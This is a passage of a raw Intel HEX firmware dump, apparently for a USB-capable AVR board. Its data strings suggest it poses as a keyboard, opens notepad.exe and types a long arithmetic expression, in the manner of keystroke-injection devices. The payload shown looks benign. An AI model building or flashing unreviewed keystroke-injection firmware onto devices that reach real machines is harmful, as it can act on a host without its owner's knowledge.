 85 | :10054000CF911F910F91FF90EF900895CF93DF937C
 86 | :10055000CDB7DEB769970FB6F894DEBF0FBECDBF3B
 87 | :10056000FC01DB018C918F5F8C93BE016F5F7F4F2D
 88 | :1005700089E1DB011D928A95E9F729E0298384E06E
 89 | :100580008A8391E09D8383E08E832A8721E22B87F3
 90 | :100590009C879D879F8722E2288B27E02B8B25E075
 91 | :1005A0002C8B8E8B20E430E0388F2F8B998F8281BB
 92 | :1005B0008B8395858685998B8A8B838180688D8BCB
 93 | :1005C00049E150E080E00E947E0169960FB6F89400
 94 | :1005D000DEBF0FBECDBFDF91CF910895FC018281B8
 95 | :1005E0008F5BFB01808381E00895CF92DF92EF92D1
 96 | :1005F000FF920F931F93CF93DF936C01EB017B016D
 97 | :10060000E40EF51E00E010E0CE15DF0581F06991E3
 98 | :100610006D30D1F3D601ED91FC910190F081E02D88
 99 | :10062000C6010995892B19F00F5F1F4FEDCFC80147
100 | :10063000DF91CF911F910F91FF90EF90DF90CF90BE
101 | :100640000895089580E090E008950E94210D1F9282
102 | :100650000F920FB60F9211248F939F938091E10018
103 | :100660009091E100937F9093E10083FF0FC010927F
104 | :10067000E90091E09093EB001092EC0092E39093EC
105 | :10068000ED001092050598E09093F00082FF20C0E5
106 | :1006900093E09093E9009091F200992319F09AE386
107 | :1006A0009093E80090910005992339F0909100050E
108 | :1006B000915090930005992389F190910405992315
109 | :1006C00039F090910405915090930405992341F1DC
110 | :1006D00084FF10C08091E2008E7E81608093E200F2
111 | :1006E0008091E1008F7E8093E100809102058E7EF3
112 | :1006F000806111C080FF16C08091E2008E7E806113
113 | :100700008093E2008091E1008E7E8093E1008091F1
114 | :1007100002058E7E81608093020504C05D9ACDCF74
115 | :10072000289AD6CF9F918F910F900FBE0F901F9058
116 | :1007300018951F920F920FB60F921124CF92DF924D
117 | :10074000EF92FF920F931F932F933F934F935F93DB
118 | :100750006F937F938F939F93AF93BF93EF93FF9389
119 | :10076000CF93DF93CDB7DEB76C97DEBFCDBF1092CE
120 | :10077000E9008091E80083FFEDC168E0CE01459675
121 | :100780000E94A50182EF8093E8008D8987FF05C054
122 | :100790009091E80090FFFCCF03C09EEF9093E8009B
123 | :1007A000982F907609F0C6C09E892F89188D9111D7
124 | :1007B0000CC0803829F4809103058093F10002C0B9
125 | :1007C0001092F1001092F10048C1422F50E0512BDD
126 | :1007D000913051F4811141C14130510509F03DC1C1
127 | :1007E000809103058D7F0BC0933061F4811135C179
128 | :1007F0004130510509F031C1809103058260809339
129 | :1008000003052BC1953041F48091E80080FFFCCFB7
130 | :1008100020682093E30021C1963009F05FC0EB8C83
131 | :10082000FC8C1092E9001092FF041092FE0412302A
132 | :1008300091F51092FD041092FC040E94F10199E0E0
133 | :10084000BE016F5F7F4FDB01E92F1D92EA95E9F74B
134 | :1008500099831A8391E09E8390EA98879AEF99870B
135 | :100860002091FE043091FF04275F3F4F3C832B8390
136 | :100870008D831092E9001092FF041092FE04F09212
137 | :10088000FD04E092FC0449E050E080E00E947E011B
138 | :100890000E94F101E2C0F092FD04E092FC040E948B
139 | :1008A000DD01DC011296ED90FC901397E114F10448
140 | :1008B00009F4C0C0D701ED91FC910480F581E02DD1
141 | :1008C000BE016B5E7F4FC7010995009719F00CF0D0
142 | :1008D000C4C0C7C0F701E084F184E8CF973009F4C1
143 | :1008E000C0C0983021F481E08093F100B6C0993007
144 | :1008F00009F0B3C0837009F0B4C0E1E0F1E081E039
145 | :1009000021E036E39081992361F08093E900209300
146 | :10091000EB0091919093EC003093ED008F5F873066
147 | :1009200089F78EE78093EA001092EA008F8980931E
148 | :10093000050593C08B8D9C8D1092E9001092FF04E9
149 | :100940001092FE049093FD048093FC04898D811124
150 | :1009500056C08E899D89913A59F4813209F081C03F
151 | :1009600047E050E06BE071E080E00E947E0175C0DE
152 | :10097000913209F076C0833289F4888D90E0982F07
153 | :1009800088272F89822BA0E0B0E080930701909305
154 | :100990000801A0930901B0930A015FC0803269F495
155 | :1009A0008091E80082FFFCCF67E08BE091E00E943D
156 | :1009B000A5018BEF8093E80006C0823209F04DC09C
157 | :1009C0008F898093120180910105882319F0EEEF41
158 | :1009D000FAE002C0E0E0F8E080910B0190910C0198
159 | :1009E000A0910D01B0910E01803B9440A105B1058D
160 | :1009F00009F07BC08091120180FF93C076C00E94F5
161 | :100A0000DD01DC0112960D911C9113970115110562
162 | :100A100041F1D801ED91FC910190F081E02DBE01F2
163 | :100A20006B5E7F4FC8010995811117C0F8010085E1
164 | :100A30001185ECCF113009F44EC0133091F48F8939
165 | :100A4000882309F445C0823081F440E860E180E900
166 | :100A500091E00E944101882321F08EEF8093E8000D
167 | :100A600079C081E28093EB0075C0813029F440E8C1
168 | :100A70006BE084E891E0EDCF833099F70E94DD01CF
169 | :100A8000DC011296ED90FC9013978E010F5F1F4FC3
170 | :100A90006801E114F10479F0D701ED91FC91068031
171 | :100AA000F781E02DB801C7010995080F111DF70165
172 | :100AB000E084F184EECFD8011C92F6010190002071
173 | :100AC000E9F73197BF016C197D0940E0C601C1CF3C
174 | :100AD0006EE671E002C062E771E06115710509F22E
175 | :100AE000FB01449150E080E840CF0FB6F894A89500
176 | :100AF00080916000886180936000109260000FBE5A
177 | :100B0000A895EE3F2AE0F20739F08091FE0A909115
178 | :100B1000FF0A91838083A1CF1092FF0A1092FE0AF0
179 | :100B20009CCFEE3F8AE0F80731F08081918190936D
180 | :100B3000FF0A8093FE0A87E797E7918380839BE013
181 | :100B400088E10FB6F894A895809360000FBE90934B
182 | :100B5000600083CF6C960FB6F894DEBF0FBECDBF9A
183 | :100B6000DF91CF91FF91EF91BF91AF919F918F91C5
184 | :100B70007F916F915F914F913F912F911F910F91B5
185 | :100B8000FF90EF90DF90CF900F900FBE0F901F90CF
186 | :100B900018952FB7F89487708093E9009091E8003A
187 | :100BA000892F807295FF04C09091F20080E4891B28
188 | :100BB0002FBF08957F928F929F92AF92BF92CF9254
189 | :100BC000DF92EF92FF920F931F93CF93DF93C82E84
190 | :100BD0008B017A0180910505811103C08FEF9FEF92
191 | :100BE00075C08091020580FF05C08091E0008260A1
192 | :100BF0008093E000CE2DDF2DD12C8AEF882E8C2D16
193 | :100C00008770B82E8C2D8072A82E8C2D8074982E13
194 | :100C10009AE3792E209709F452C08C2D0E94C905C1
195 | :100C2000282F81110AC08A948820C1F261E070E007
196 | :100C300080E090E00E94B608EDCF90E0C817D90799
197 | :100C40000CF42C2F3FB7F894B092E9008091E800A3
198 | :100C500085FF33C0822F90E0C81BD90BAA2029F052
199 | :100C60002150A8F01092F100FBCFF801C7FE07C099
200 | :100C7000215058F044914093F1003196F9CF215022
201 | :100C800020F041914093F100FACF080F191FDD20A9
202 | :100C900019F07092E8000AC08091E80085FD08C054
203 | :100CA0007092E800DD24D394209739F0D12C05C050
204 | :100CB000209719F491107092E8003FBFABCFD1108C
205 | :100CC000ACCF5D9884E680930005C701DF91CF919A
206 | :100CD0001F910F91FF90EF90DF90CF90BF90AF905A
207 | :100CE0009F908F907F900895CF93DF93EC0181E0E8
208 | :100CF0008C838D839E01265F3F4F3F832E83198611
209 | :100D0000188627E131E0398328831C861B861E86DE
210 | :100D10001D868F87888B81EC8A870E94DD01FC010C
211 | :100D200021818C8190E0820F911D089774F5A2813A
212 | :100D3000B381109719F4D383C2830CC018968D9198
213 | :100D40009C911997009711F0DC01F8CF1996DC936C
214 | :100D5000CE93189780818A8381818B8390818D8146
215 | :100D6000890F808380E09C81891778F4AE81BF81F0
216 | :100D7000A80FB11D9C91A181B0E0A050BF4F9C93E2
217 | :100D800091819F5F91838F5FEECFDF91CF91089527
218 | :100D90000F931F93CF93DF931F92CDB7DEB78B01D5
219 | :100DA00080911705811107C086E095E00E947406C6
220 | :100DB00081E08093170582E0898341E050E0BE0125
221 | :100DC0006F5F7F4F809109050E94DA0597FD08C08B
222 | :100DD0008091090548E050E0B80180640E94DA057E
223 | :100DE0000F90DF91CF911F910F910895DC0168382A
224 | :100DF00010F068582DC0E62FF0E067FF11C0E058F2
225 | :100E0000F10981E090E001C0880FEA95EAF71496B5
226 | :100E10009C911497892B14968C93149760E018C0BA
227 | :100E2000E455FF4F6491611109C081E090E0139691
228 | :100E30009C938E93129780E090E0089567FF08C01E
229 | :100E400014968C911497826014968C9314976F77F4
230 | :100E500016968C911697861751F117968C911797C5
231 | :100E6000861729F118968C911897861701F1199613
232 | :100E70008C9119978617D9F01A968C911A97861724
233 | :100E8000B1F01B968C911B97861789F0FD01369661
234 | :100E900080E090E02191211105C0FD01E80FF91FCC
235 | :100EA000668305C0019686309105A1F7BECFCD01BE
236 | :100EB000BD016C5F7F4F0E94C80681E090E00895FD
237 | :100EC000EF92FF920F931F93CF938C01C62F0E9436
238 | :100ED000F6067C01C83818F068E76C0F1FC0EC2FCD
239 | :100EE000F0E0C7FF0FC0E058F10921E030E001C099
240 | :100EF000220FEA95EAF72095F801848128232483BC
241 | :100F000060E00CC0E455FF4F64916623D1F067FFA9
242 | :100F100005C0F80184818D7F84836F77F801369650
243 | :100F200086E0662321F09081961301C010828150E3
244 | :100F300031968111F6CFB8016C5F7F4FC8010E94D6
245 | :100F4000C806C7019927CF911F910F91FF90EF908D
246 | :100F50000895FC0180910505811103C08FEF9FEF7B
247 | :100F600008959FB7F89482E08093E9002091F20001
248 | :100F700030E01216130614F421E030E0211531059B
249 | :100F800059F0289884E6809304058091F1008083CD
250 | :100F90008091F200882319F09FBFC90108958BE664
251 | :100FA0008093E800F9CFCF93DF931F92CDB7DEB7E0
252 | :100FB0006983DC01ED91FC910280F381E02D41E039
253 | :100FC00050E0BE016F5F7F4F09950F90DF91CF9189
254 | :100FD000089583E08093E9008091F200882319F05E
255 | :100FE0008AE38093E8000895CF93DF931F92CDB7F3
256 | :100FF000DEB7FC018485958597FD05C02FEF3FEF97
257 | :10100000358724870BC0CE0101960E94A90701975E
258 | :1010100019F4898190E002C08FEF9FEF0F90DF916C
259 | :10102000CF9108950F931F93CF93DF931F92CDB766
260 | :10103000DEB78C01FC018485958597FF0EC0CE013B
261 | :1010400001960E94A907019719F4298130E002C096
262 | :101050002FEF3FEFF80135872487F80184859585C8
263 | :101060000F90DF91CF911F910F910895FC0184851E
264 | :10107000958597FD0BC09FB7F89482E08093E900B7
265 | :101080008091F2009FBF90E0019608959FB7F89479
266 | :1010900082E08093E9008091F2009FBF90E0089584
267 | :1010A0003FB7F8948091240590912505A0912605DD
268 | :1010B000B091270526B5A89B05C02F3F19F00196D2
269 | :1010C000A11DB11D3FBFBA2FA92F982F8827820FCE
270 | :1010D000911DA11DB11DBC01CD0142E0660F771F1E
271 | :1010E000881F991F4A95D1F70895BC01009791F088
272 | :1010F000FC0101900020E9F73197AF01481B590B23
273 | :10110000E0918605F09187050280F381E02D86E865
274 | :1011100095E0099480E090E00895CF93DF930E94DA
275 | :101120007508EC018DE391E00E9475088C0F9D1FFE
276 | :10113000DF91CF910895CF93DF93EC01809112015D
277 | :10114000882331F083E00E94DA051816190634F07E
278 | :1011500081E090E09B838A8380E090E0DF91CF91F3
279 | :10116000089583E00E94C90590E008958F929F92B0
280 | :10117000AF92BF92CF92DF92EF92FF926B017C0110
281 | :101180000E9450084B015C01C114D104E104F10438
282 | :10119000F1F00E945008DC01CB0188199909AA09D5
283 | :1011A000BB09883E9340A105B10570F321E0C21A46
284 | :1011B000D108E108F10888EE880E83E0981EA11C92
285 | :1011C000B11CC114D104E104F10419F7DDCFFF9083
286 | :1011D000EF90DF90CF90BF90AF909F908F90089549
287 | :1011E0001F920F920FB60F9211242F933F938F935C
288 | :1011F0009F93AF93BF938091200590912105A0917B
289 | :101200002205B091230530911F0523E0230F2D37D0
290 | :1012100020F40196A11DB11D05C026E8230F0296FA
291 | :10122000A11DB11D20931F058093200590932105DA
292 | :10123000A0932205B0932305809124059091250564
293 | :10124000A0912605B09127050196A11DB11D80939F
294 | :10125000240590932505A0932605B0932705BF91FB
295 | :10126000AF919F918F913F912F910F900FBE0F9053
296 | :101270001F90189510922B0510922A0588EE93E086
297 | :10128000A0E0B0E080932C0590932D05A0932E054F
298 | :10129000B0932F0583E291E0909329058093280570
299 | :1012A0008FEF9FEF90933505809334051092890559
300 | :1012B0001092880585E391E09093870580938605D9
301 | :1012C00080917E05811113C01092790510927805E6
302 | :1012D00081EA91E090937B0580937A058FE290E01C
303 | :1012E00090937D0580937C0581E080937E058091BD
304 | :1012F0001705811107C086E095E00E94740681E021
305 | :1013000080931705E0911105F0911205309739F49B
306 | :1013100088E795E090931205809311050AC08081BB
307 | :101320009181009711F0FC01FACF88E795E0918355
308 | :10133000808320917C0530917D05809113059091EB
309 | :101340001405820F931F909314058093130508953D
310 | :10135000789484B5826084BD84B5816084BD85B590
311 | :10136000826085BD85B5816085BD80916E0081609C
312 | :1013700080936E0010928100809181008260809342
313 | :101380008100809181008160809381008091800044
314 | :1013900081608093800080919100826080939100B1
315 | :1013A0008091910081608093910080919000816094
316 | :1013B000809390008091C10084608093C1008091EF
317 | :1013C000C10082608093C1008091C10081608093E0
318 | :1013D000C1008091C30081608093C3008091C000F0
319 | :1013E00082608093C0008091C20081608093C200BF
320 | :1013F00080917A00846080937A0080917A00826084
321 | :1014000080937A0080917A00816080937A00809145
322 | :101410007A00806880937A00109205051092030587
323 | :10142000109202058091D70081608093D70080EAF6
324 | :101430008093D80089B5806189BD89B5826089BDF6
325 | :1014400009B400FEFDCF61E070E080E090E00E9412
326 | :10145000B6088091D8008F7C80618093D8008091FD
327 | :10146000E000807F8093E0008091E1008E7E809399
328 | :10147000E1008DE08093E200559A209AEEEFFFE7BD
329 | :10148000859194918B3F9C4D19F481E080930105E7
330 | :1014900068E873E180E090E00E94B60863E886E8BF
331 | :1014A00095E00E94F60662E786E895E00E94F6065F
332 | :1014B00010928C0510928D0510928E0510928F055A
333 | :1014C000109290051092910510928A056AE875E0D5
334 | :1014D00086E895E00E94C80664EF71E080E090E045
335 | :1014E0000E94B60880E491E00E948D0864EF71E0EC
336 | :1014F00080E090E00E94B6088CE491E00E948D08A4
337 | :1015000064EF71E080E090E00E94B60883E591E02E
338 | :101510000E948D0864EF71E080E090E00E94B608C0
339 | :1015200082E691E00E948D0864EF71E080E090E037
340 | :101530000E94B60887E791E00E948D0864EF71E091
341 | :1015400080E090E00E94B6088BE891E00E948D0850
342 | :1015500064EF71E080E090E00E94B60889EA91E0D3
343 | :101560000E948D0864EF71E080E090E00E94B60870
344 | :1015700088EC91E00E948D0864EF71E080E090E0DB
345 | :101580000E94B60883ED91E00E948D0864EF71E03F
346 | :1015900080E090E00E94B6088BEE91E00E948D08FA
347 | :1015A00064EF71E080E090E00E94B6088EEF91E079
348 | :1015B0000E948D0864EF71E080E090E00E94B60820
349 | :1015C0008EE592E00E948D0864EF71E080E090E08B
350 | :1015D0000E94B60887E092E00E948D0864EF71E0F7
351 | :1015E00080E090E00E94B6088CE192E00E948D08B5
352 | :1015F00064EF71E080E090E00E94B60887E292E03C
353 | :101600000E948D0864EF71E080E090E00E94B608CF
354 | :1016100086E492E00E948D0864EF71E080E090E043
355 | :101620000E94B60881E692E00E948D0864EF71E0A6
356 | :1016300080E090E00E94B60880E792E00E948D086A
357 | :1016400064EF71E080E090E00E94B6088BE892E0E1
358 | :101650000E948D0864EF71E080E090E00E94B6087F
359 | :1016600088E992E00E948D0864EF71E080E090E0EC
360 | :101670000E94B60883EA92E00E948D0864EF71E050
361 | :1016800080E090E00E94B60881EB92E00E948D0815
362 | :1016900064EF71E080E090E00E94B6088CE592E093
363 | :1016A0000E948D0864EF71E080E090E00E94B6082F
364 | :1016B0008AEB92E00E948D0864EF71E080E090E098
365 | :1016C0000E94B60885EC92E00E948D0864EF71E0FC
366 | :1016D00080E090E00E94B60880ED92E00E948D08C4
367 | :1016E00064EF71E080E090E00E94B60887ED92E040
368 | :1016F0000E948D0864EF71E080E090E00E94B608DF
369 | :1017000082EF92E00E948D0864EF71E080E090E04B
370 | :101710000E94B60887E093E00E948D0864EF71E0B4
371 | :1017200080E090E00E94B60880E193E00E948D087E
372 | :1017300064EF71E080E090E00E94B6088EE592E0F0
373 | :101740000E948D0864EF71E080E090E00E94B6088E
374 | :1017500087E293E00E948D0864EF71E080E090E002
375 | :101760000E94B60886E493E00E948D0864EF71E061
376 | :1017700080E090E00E94B6088CED93E00E948D0816
377 | :1017800064EF71E080E090E00E94B6088DE493E0A1
378 | :101790000E948D0864EF71E080E090E00E94B6083E
379 | :1017A00084E693E00E948D0864EF71E080E090E0B1
380 | :1017B0000E94B60883E793E00E948D0864EF71E011
381 | :1017C00080E090E00E94B6088FE893E00E948D08C8
382 | :1017D00064EF71E080E090E00E94B60886EA93E052
383 | :1017E0000E948D0864EF71E080E090E00E94B608EE
384 | :1017F00083EB93E00E948D0864EF71E080E090E05D
385 | :101800000E94B6088FEB93E00E948D0864EF71E0B0
386 | :1018100080E090E00E94B60880ED93E00E948D0881
387 | :1018200064EF71E080E090E00E94B6088FED93E0F5
388 | :101830000E948D0864EF71E080E090E00E94B6089D
389 | :101840008FEE93E00E948D0864EF71E080E090E0FD
390 | :101850000E94B60880E094E00E948D0864EF71E079
391 | :1018600080E090E00E94B6088BE494E00E948D082E
392 | :1018700064EF71E080E090E00E94B60883E194E0BC
393 | :101880000E948D0864EF71E080E090E00E94B6084D
394 | :101890008CE294E00E948D0864EF71E080E090E0BB
395 | :1018A0000E94B6088BE394E00E948D0864EF71E01B
396 | :1018B00080E090E00E94B6088FE494E00E948D08DA
397 | :1018C00064EF71E080E090E00E94B60882E594E069
398 | :1018D0000E948D0864EF71E080E090E00E94B608FD
399 | :1018E00080E994E00E948D0864EF71E080E090E070
400 | :1018F0000E94B6088FE594E00E948D0864EF71E0C5
401 | :1019000080E090E00E94B6088CE694E00E948D088A
402 | :1019100064EF71E080E090E00E94B6088DE794E00B
403 | :101920000E948D0864EF71E080E090E00E94B608AC
404 | :101930008EE894E00E948D0864EF71E080E090E012
405 | :101940000E94B60887E994E00E948D0864EF71E078
406 | :1019500080E090E00E94B6088EE994E00E948D0835
407 | :1019600064EF71E080E090E00E94B60885EB94E0BF
408 | :101970000E948D0864EF71E080E090E00E94B6085C
409 | :101980008BEC94E00E948D0864EF71E080E090E0C1
410 | :101990000E94B60885E494E00E948D0864EF71E02F
411 | :1019A00080E090E00E94B60885E494E00E948D08F3
412 | :1019B00064EF71E080E090E00E94B60886ED94E06C
413 | :1019C0000E948D0864EF71E080E090E00E94B6080C
414 | :1019D0008DE494E00E948D0864EF71E080E090E077
415 | :1019E0000E94B6088DE494E00E948D0864EF71E0D7
416 | :1019F00080E090E00E94B60884E994E00E948D089F
417 | :101A000064EF71E080E090E00E94B60885EE94E01B
418 | :101A10000E948D0864EF71E080E090E00E94B608BB
419 | :101A20008FE494E00E948D0864EF71E080E090E024
420 | :101A30000E94B608FFCFEE0FFF1F0590F491E02D36
421 | :101A4000099481E090E0F8940C94260DF894FFCF6F
422 | :101A500000C18081000000FFFFFFFF00E1000000E7
423 | :101A6000000000000000002302A60266024A0200F5
424 | :101A7000000000D3079B08B108E9073608F40712F5
425 | :101A800008000000006007F502220321030D0A0090
426 | :101A90006E6F74657061642E657865003434363419
427 | :101AA0003620002B2028203634303934202B2028B3
428 | :101AB00020003731383235202A202820282031359F
429 | :101AC000383733202B200028203231373933202A71
430 | :101AD00020282037323334202B200028203137367D
431 | :101AE0003439202A202820282032313535202B2057
432 | :101AF0002820373437363720002A20282033353342
433 | :101B00003932202B2028203838323136202A20281C
434 | :101B100020383339323020002B202820313632371C
435 | :101B20003020002B2028203230313531202A202847
436 | :101B30002035323638202B202820003930363933F2
437 | :101B4000202A2028203832373733202B2000282025
438 | :101B5000373136202B20003237333737202A2028E0
439 | :101B6000203434333239202B2028200034393336C6
440 | :101B700036202A20282000282028203338373930E2
441 | :101B8000202B2028203730323437202A20282039B3
442 | :101B90003732333320002B2028203138333437209C
443 | :101BA0002B2028203232313137202A2028202820AB
444 | :101BB0000028203732353736202B202820282000D7
445 | :101BC0003437353431202B2028203436393735202E
446 | :101BD0002B202820353337363920002A2028203979
447 | :101BE00034303035202B200028202820373239315E
448 | :101BF0003420002B20282035313337202B2028207B
449 | :101C0000003837353434202A200037313538332036
450 | :101C10002B202820003230333730202B2028200082
451 | :101C2000333739363820002A2028203137343738E6
452 | :101C3000202B20282028203430353332202B202818
453 | :101C400020003130303839202B20282031333333F5
454 | :101C500032202A202820002820323431373020003A
455 | :101C60002B2028203436383435202A2028203136BD
456 | :101C7000303438202B20003233313432202A2028CF
457 | :101C8000203331383935202B20282036323338366E
458 | :101C9000202A2028200031323137392000282039ED
459 | :101CA00034353532202B2028202820282035323981
460 | :101CB000313820002B2028203931353830202B2096
461 | :101CC000282000282028203338343132202B2028A7
462 | :101CD000203931353337202A202820373020002B77
463 | :101CE0002028203938353934202A2028202820334C
464 | :101CF0003532373520002B2028203632393132203A
465 | :101D00002A2000282034373535202B202820003188
466 | :101D100036373337202A202820323735393520000E
467 | :101D20002B20282028203433353531202B20002843
468 | :101D3000203634343832202A2033353530200029FB
469 | :101D40002029202D20323130333120292029200034
470 | :101D500029202920292029202D20353735353320E9
471 | :101D600029200029202D2038393838332029202DEA
472 | :101D700020333839303020292029200029202D20F7
473 | :101D800031393531372029202D200037393038328C
474 | :101D900020292029202920292029202920292029FB
475 | :101DA00020002D20373036343320292029200035DB
476 | :101DB00035333530202920292029200029202920C9
477 | :101DC0002D203430333031202920292000292029AA
478 | :101DD000202D203833303635202920292000292095
479 | :101DE000292029202D2000353234363020002920AA
480 | :101DF00029202D2034393432382029202D2039341F
481 | :101E00003638362000292029202920292029202978
482 | :101E1000202D2031363533202920002D2036353233
483 | :101E2000313720292000292029202D203433383231
484 | :101E30003720292000363635363220292029200047
485 | :2070000055C000006EC000006CC000006AC0000068C0000066C0000064C0000062C0000043
486 | :2070200060C000005EC00000F2C400005AC0000058C0000056C0000054C0000052C00000EE
487 | :2070400050C0000078C000004CC000004AC0000048C0000046C0000044C0000042C00000BE
488 | :2070600040C000003EC000003CC000003AC0000038C0000036C0000034C0000032C0000048
489 | :2070800030C000002EC000002CC000002AC0000028C0000026C0000024C0000022C00000A8
490 | :2070A00020C000001EC000001CC0000011241FBECFEFDAE0DEBFCDBF11E0A0E0B1E0E2E3BC
491 | :2070C000FFE702C005900D92A83AB107D9F711E0A8EAB1E001C01D92AE3BB107E1F78FD30B
492 | :2070E00026C78ECFF89410926F0010928100109285001092840081E085BF15BE47985D9AEB
493 | :20710000289A0C94000008952091B2013091B3012F5F3F4F3093B3012093B201932F37FFA6
494 | :2071200003C08EEF831B982F990F921710F447980895479A08951F920F920FB60F9211246E
495 | :207140002F938F939F93EF93FF9310928500109284008091A8019091A901009741F00197D3
496 | :207160009093A9018093A801892B09F45D9A8091AA019091AB01009741F001979093AB0126
497 | :207180008093AA01892B09F4289AE0E0F0E0859194918F5F9F4F49F08091AC019091AD0151
498 | :2071A00001969093AD018093AC01FF91EF919F918F912F910F900FBE0F901F90189584E0BC
499 | :2071C0008093E9000DC08091E8008B778093E80003C08EB3882351F08091E80082FFF9CFBE
500 | :2071E0008091E80085FFEFCF8091F1000895982F83E08093E9008091E80085FD0DC0809136
501 | :20720000E8008E778093E80003C08EB3882369F08091E80080FFF9CF9093F1005D9884E6CB
502 | :2072200090E09093A9018093A80108954F925F926F927F928F929F92AF92BF92CF92DF921E
503 | :20724000EF92FF920F931F93CF93DF9384E08093E9008091E80082FF57C2289884E690E067
504 | :207260009093AB018093AA01AADF182F853481F48CE49DE19093AD018093AC0107B600FC4B
505 | :20728000FDCFF999FECF81E180935700E89503C0843519F494DF8DE00DC28C34E1F38035F9
506 | :2072A000D1F3843721F484E4A2DF80E003C2813611F489E5FFC18134B1F481DF182F7FDFE3
507 | :2072C00090E0880F991FAA2797FDA095BA2F312F330F20E0442737FD4095542F822B932B68
508 | :2072E000A42BB52BB8C1803711F483E5E3C1833549F4C0E0D1E089917ADF21E0C730D20714
509 | :20730000D1F7D9C1863521F481E371DF80E3D2C1833731F487E86BDF85E969DF8EE1CAC149
510 | :207320008536B9F4E0E0F0E093E085E090935700E89507B600FCFDCF80935700E89507B65D
511 | :2073400000FCFDCFE058FF4FA0E7E030FA0771F7A2CF823739F4E1E0F0E089E08093570024
512 | :207360008491A8C1863439F4E0E0F0E089E08093570084919FC18E3439F4E3E0F0E089E0E5
513 | :2073800080935700849196C1813539F4E2E0F0E089E08093570084918DC1823631F489E521
514 | :2073A00026DF80E024DF80E885C1823419F0873609F0E5C01092AD011092AC0100DF082FE8
515 | :2073C000FEDEF82EFCDE682E8554823008F071C1902F80E0CF2DD0E0C82BD92B10926F00B3
516 | :2073E000173609F04BC081E180935700E895DD24CC24C3943FC0E090AE01F090AF010091CC
517 | :20740000B0011091B101B6E46B16D9F4ED2DF0E0EE29FF29E4918E2FEADEDD2081F082E08D
518 | :2074200090E0A0E0B0E0E80EF91E0A1F1B1FE092AE01F092AF010093B0011093B101DC2470
519 | :2074400018C0D801C701B695A7959795879559D5CEDE82E090E0A0E0B0E0E80EF91E0A1FF2
520 | :207460001B1FE092AE01F092AF010093B0011093B1012197209709F0BECF7DC08090AE01F5
521 | :207480009090AF01A090B001B090B10196E4691609F05DC083E0F40180935700E89507B63E
522 | :2074A00000FCFDCF54C0F6E46F1661F5772031F1E090AE01F090AF010091B0011091B1019E
523 | :2074C0007EDED82ECC24852D90E08C299D29F7010C0140925700E895112482E090E0A0E08B
524 | :2074E000B0E0E80EF91E0A1F1B1FE092AE01F092AF010093B0011093B10102C060DE582E1A
525 | :20750000742423C0E090AE01F090AF010091B0011091B10116950795F794E79450DE682FFA
526 | :20752000C701F7D48091AE019091AF01A091B001B091B1010296A11DB11D8093AE01909349
527 | :20754000AF01A093B001B093B101219704C05524772444244394209709F0A5CF96E46916B6
528 | :2075600041F485E0F40180935700E89507B600FCFDCF8DE03CDE82E080936F009CC0833492
529 | :2075800071F40091AE011091AF0119DE90E021E0F8010C0120935700E89511247CCE8336C8
530 | :2075A00019F5E090AE01F090AF010091B0011091B10105DEF701E16090E021E00C0120938C
531 | :2075C0005700E895112482E090E0A0E0B0E0E80EF91E0A1F1B1FE092AE01F092AF0100936A
532 | :2075E000B0011093B10157CE8D3661F4E091AE01F091AF0185E080935700E89507B600FCF2
533 | :20760000FDCF49CE823551F4E091AE01F091AF0105911491812FEBDD802F4CC0843421F5FE
534 | :20762000E090AE01F090AF010091B0011091B10116950795F794E794C2DD682FC70169D4DE
535 | :207640008091AE019091AF01A091B001B091B1010296A11DB11D8093AE019093AF01A093D8
536 | :20766000B001B093B10117CE843609F5E090AE01F090AF010091B0011091B101D801C70142
537 | :20768000B695A795979587953CD4B1DD82E090E0A0E0B0E0E80EF91E0A1F1B1FE092AE010A
538 | :2076A000F092AF010093B0011093B10104C08B3111F08FE39CDD83E08093E9009091E8002B
539 | :2076C0008091E8008E778093E80095FF04C010C08EB38823C9F08091E80080FFF9CF809193
540 | :2076E000E8008E778093E80003C08EB3882361F08091E80080FFF9CF84E08093E9008091F1
541 | :20770000E8008B778093E800DF91CF911F910F91FF90EF90DF90CF90BF90AF909F908F90AC
542 | :207720007F906F905F904F9008959091B601892F8F77813249F58091B7018032A1F081328A
543 | :2077400019F5913A09F58091E800877F8093E8008DE091E067E070E00BD28091E8008B770B
544 | :207760008093E8000895913279F48091E800877F8093E8008DE091E067E070E05DD2809192
545 | :20778000E8008E778093E800089582E061EC42E0B5D083E061E842E1B1D084E060E842E1EF
546 | :2077A000ADC084B7877F84BF88E10FB6F89480936000109260000FBE20E880E090E00FB63F
547 | :2077C000F89420936100809361000FBE81E085BF92E095BF3F9A209A559AE1E6F0E02083A1
548 | :2077E000108247985D9A289A109289008AEF8093880090936F0083E080938100F0C0409116
549 | :20780000000850910108109201081092000894B714BE88E10FB6F8948093600010926000D5
550 | :207820000FBE292F30E0F901E270F07091FD18C090FF05C0859194918F5F9F4F81F423FFFF
551 | :207840000FC08091090190910A014817590741F0E0E0F0E0859194918F5F9F4F09F042DC64
552 | :20786000A0DF78941092AD011092AC010CC0DEDC36D38091AC019091AD0181549F4110F00D
553 | :207880001092140141DC80911401882381F78091E00081608093E00025DC80E090E0089598
554 | :2078A000FA01923049F0933061F09130F9F485E191E022E130E01EC087E291E02EE330E04D
555 | :2078C00019C0882329F485E691E024E030E012C0813029F489E691E022E230E00BC0823006
556 | :2078E00029F48DE891E028E130E004C080E090E020E030E091838083C90108958093E9004E
557 | :207900008091EB0081608093EB001092ED006093EC004093ED008091EE00881F8827881F62
558 | :2079200008958091B60188238CF403C08EB38823B1F08091E80082FFF9CF8091E8008B772A
559 | :207940008093E80008958EB3882349F08091E80080FFF9CF8091E8008E778093E800089594
560 | :20796000EF92FF920F931F9345D04CD008ED10E0F80180818F77808380818068808380819B
561 | :207980008F7D808319BC1EBA1092B40180EEE82EF12CF70180818B7F8083F8018081816052
562 | :2079A000808380E060E042E0A9DFE1EEF0E080818E7F8083E2EEF0E0808181608083808144
563 | :2079C00088608083F70180818E7F8083F8018081806180831F910F91FF90EF900895E7ED06
564 | :2079E000F0E08081816080838AE482BF81E08093B501B6CFE8EDF0E080818E7F808310921C
565 | :207A0000E20008951092DA001092E10008951F920F920FB60F9211242F933F934F935F93F6
566 | :207A20006F937F938F939F93AF93BF93EF93FF938091DA0080FF1BC08091D80080FF17C0B2
567 | :207A40008091DA008E7F8093DA008091D90080FF0BC080E189BD82E189BD09B400FEFDCF36
568 | :207A600081E08EBB3BD203C019BC1EBA37D28091E10080FF17C08091E20080FF13C0809138
569 | :207A8000E2008E7F8093E2008091E20080618093E2008091D80080628093D80019BC85E049
